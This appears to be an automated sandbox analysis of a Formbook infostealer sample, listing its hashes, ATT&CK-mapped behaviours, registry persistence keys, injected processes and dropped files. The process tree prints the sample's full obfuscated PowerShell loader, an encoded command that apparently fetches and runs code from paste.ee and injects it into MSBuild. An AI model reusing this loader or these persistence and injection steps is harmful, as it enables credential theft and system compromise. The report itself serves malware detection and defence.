formbook | 0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16

General

Target

DvnH2.exe
Size

847KB
MD5

bc23e4cf90c63d9a84eb905e6ec82f82
SHA1

b82df977fcc19b730ac2cdacec7d3b93617c57ed
SHA256

0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
SHA512

01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4

Score

10^/10

trojan spyware stealer formbook persistence evasion

Malware Config

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Explorer.EXE

pid process

1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE

pid	process
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

cmmon32.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	cmmon32.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

DvnH2.exepowershell.exepowershell.exeExplorer.EXEcmmon32.exe

description	pid	process	target process
PID 676 wrote to memory of 872	676	DvnH2.exe	powershell.exe
PID 676 wrote to memory of 872	676	DvnH2.exe	powershell.exe
PID 676 wrote to memory of 872	676	DvnH2.exe	powershell.exe
PID 676 wrote to memory of 872	676	DvnH2.exe	powershell.exe
PID 872 wrote to memory of 1036	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 1036	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 1036	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 1036	872	powershell.exe	powershell.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1036 wrote to memory of 1816	1036	powershell.exe	MSBuild.exe
PID 1184 wrote to memory of 1836	1184	Explorer.EXE	cmmon32.exe
PID 1184 wrote to memory of 1836	1184	Explorer.EXE	cmmon32.exe
PID 1184 wrote to memory of 1836	1184	Explorer.EXE	cmmon32.exe
PID 1184 wrote to memory of 1836	1184	Explorer.EXE	cmmon32.exe
PID 1836 wrote to memory of 1848	1836	cmmon32.exe	cmd.exe
PID 1836 wrote to memory of 1848	1836	cmmon32.exe	cmd.exe
PID 1836 wrote to memory of 1848	1836	cmmon32.exe	cmd.exe
PID 1836 wrote to memory of 1848	1836	cmmon32.exe	cmd.exe
PID 1836 wrote to memory of 1936	1836	cmmon32.exe	Firefox.exe
PID 1836 wrote to memory of 1936	1836	cmmon32.exe	Firefox.exe
PID 1836 wrote to memory of 1936	1836	cmmon32.exe	Firefox.exe
PID 1836 wrote to memory of 1936	1836	cmmon32.exe	Firefox.exe
PID 1836 wrote to memory of 1936	1836	cmmon32.exe	Firefox.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeMSBuild.execmmon32.exe

description	pid	process
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	1816	MSBuild.exe
Token: SeDebugPrivilege	1836	cmmon32.exe

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1036 powershell.exe
5 1036 powershell.exe

flow	pid	process
4	1036	powershell.exe
5	1036	powershell.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

powershell.exepowershell.exeMSBuild.execmmon32.exe

pid	process
872	powershell.exe
872	powershell.exe
1036	powershell.exe
1036	powershell.exe
1816	MSBuild.exe
1816	MSBuild.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe

Adds Run entry to policy start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

cmmon32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	cmmon32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\J0HTUFWHU68 = "C:\\Program Files (x86)\\Badll_reh\\configafilu.exe"	cmmon32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Drops file in Program Files directory 1 IoCs

Processes:

cmmon32.exe

description ioc process

File opened for modification C:\Program Files (x86)\Badll_reh\configafilu.exe cmmon32.exe
System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

cmmon32.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer cmmon32.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Badll_reh\configafilu.exe	cmmon32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	cmmon32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Explorer.EXE

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Explorer.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeMSBuild.execmmon32.exe

description	pid	process	target process
PID 1036 set thread context of 1816	1036	powershell.exe	MSBuild.exe
PID 1816 set thread context of 1184	1816	MSBuild.exe	Explorer.EXE
PID 1836 set thread context of 1184	1836	cmmon32.exe	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

MSBuild.execmmon32.exe

pid process

1816 MSBuild.exe
1816 MSBuild.exe
1816 MSBuild.exe
1836 cmmon32.exe
1836 cmmon32.exe
1836 cmmon32.exe
1836 cmmon32.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE

pid	process
1816	MSBuild.exe
1816	MSBuild.exe
1816	MSBuild.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe
1836	cmmon32.exe

pid	process
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
PID:1184

C:\Users\Admin\AppData\Local\Temp\DvnH2.exe
"C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1816

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Adds Run entry to policy start application
- Drops file in Program Files directory
- System policy modification
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1836

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:1848

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:1936

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/872-0-0x0000000000000000-mapping.dmp

Download
memory/1036-3-0x0000000000000000-mapping.dmp

Download
memory/1816-7-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1816-8-0x000000000041E200-mapping.dmp

Download
memory/1836-12-0x0000000001D90000-0x0000000001E90000-memory.dmp

Filesize
1024KB

Download
memory/1836-14-0x0000000076220000-0x000000007633D000-memory.dmp

Filesize
1.1MB

Download
memory/1836-15-0x0000000075950000-0x0000000075AAC000-memory.dmp

Filesize
1.4MB

Download
memory/1836-21-0x0000000003B50000-0x0000000003CA9000-memory.dmp

Filesize
1.3MB

Download
memory/1836-13-0x0000000076000000-0x000000007600C000-memory.dmp

Filesize
48KB

Download
memory/1836-10-0x00000000006E0000-0x00000000006ED000-memory.dmp

Filesize
52KB

Download
memory/1836-9-0x0000000000000000-mapping.dmp

Download
memory/1848-11-0x0000000000000000-mapping.dmp

Download
memory/1936-22-0x0000000000000000-mapping.dmp

Download
memory/1936-23-0x000000013F550000-0x000000013F5E3000-memory.dmp

Filesize
588KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads